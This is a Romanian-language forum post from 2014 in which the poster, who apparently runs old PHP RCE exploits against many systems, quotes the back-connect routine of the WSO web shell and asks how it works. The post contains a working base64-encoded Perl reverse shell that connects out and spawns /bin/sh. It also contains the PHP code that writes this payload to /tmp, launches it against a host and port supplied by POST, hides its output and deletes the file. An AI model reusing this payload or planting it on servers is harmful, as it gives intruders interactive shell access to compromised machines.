Elohim Posted February 18, 2014 Report Posted February 18, 2014 (edited) Toata ziua am stat dupa unele mici /vechi exploituri, testand diferite lucruri din diferite unghiuri, si m-am lovit the problema back-connect-ului. Acele vechi vechi script-uri de sunt N variante in N limbaje. Bun, am ajuns la concluzia ca codul care shell-url WSO il foloseste se adapteaza cel mai bine, cu o rata de 28 din 35 rulari pe sisteme diferite.Bineinteles, le urc the hard way, upload / wget, cum ma descurc, insa uitandu-ma in sursa de la un shell WSO, si lucrand cu acel exploit de PHP RCE, am observat abordarea urmatoare:$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";Acolo este un cod perl, codat in b64, niciun dubiu acolo.Apoi avem asa:cf("/tmp/bc.pl",$back_connect_p);$out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");sleep(1);echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";unlink("/tmp/bc.pl");E clar ca unlink sterge fisierul, acel echo imi cauta in procese daca s-a rulat , respectiv sa imi afiseze pid-ul.Nu inteleg partea astacf("/tmp/bc.pl",$back_connect_p);Nu ma sperie functia search, si nicidecum google, si dupa nenumarate cautari, nu am reusit sa gasesc nimic despre acea functie, absolut nimic.Poate cineva sa ma lamureasca in cateva cuvinte cum se produce "magia" ?Multumesc.L.E. Ma scuzati, ora e tarzie, si se pare ca nu mai vad bine. Era chiar deasupra definitafunction cf($f,$t) { $w = @fopen($f,"w") or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } } Edited February 18, 2014 by Elohim stupid me Quote
